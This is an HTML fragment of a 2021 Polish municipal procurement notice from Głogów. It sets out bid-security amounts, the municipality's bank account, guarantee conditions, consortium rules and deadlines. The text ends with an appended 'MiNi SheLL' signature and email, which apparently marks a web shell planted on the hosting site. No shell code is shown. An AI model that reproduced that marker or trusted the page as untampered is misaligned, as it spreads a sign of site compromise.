przedsiębiorstwa (jeżeli dotyczy) <br/>7)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy (wzór określa załącznik Nr 9 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie:<br/> na część 1: 700,00 zł (słownie: siedemset złotych złotych 00/100 ). <br/> na część 2: 700,00 zł (słownie: siedemset złotych złotych 00/100 ).<br/> na część 3: 700,00 zł (słownie: siedemset złotych złotych 00/100 ).<br/> na część 4: 700,00 zł (słownie: siedemset złotych złotych 00/100 ).<br/> na część 5: 700,00 zł (słownie: siedemset złotych złotych 00/100 ).<br/> na część 6: 700,00 zł (słownie: siedemset złotych złotych 00/100 ).<br/><br/>2.	Wadium musi obejmować pełen okres związania ofertą tj. do dnia 15.12.2021 r.<br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy :<br/>Gmina Miejska Głogów <br/>Oddział BNP PARIBAS w Głogowie<br/>Nr 65 2030 0045 1110 0000 0192 9720<br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>5.	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Miejska Gogów.<br/>-	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-	kwotę gwarancji/poręczenia,<br/>-	termin ważności gwarancji/poręczenia,<br/>-	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6.	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>8.	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp.<br/>9.	Złożenie wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 ustawy Pzp, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:<br/>1)	wspólnie spełniają warunki udziału w postępowaniu,<br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia <br/>z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 4 ustawy Pzp,<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>4) muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>5) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców.<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego będzie wynikać, które usługi wykonają poszczególni wykonawcy ( załącznik nr 9 do SWZ ).<br/>7)	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Warunki zmian określone zostały w dokumentach zamówienia SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://glogow-um.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com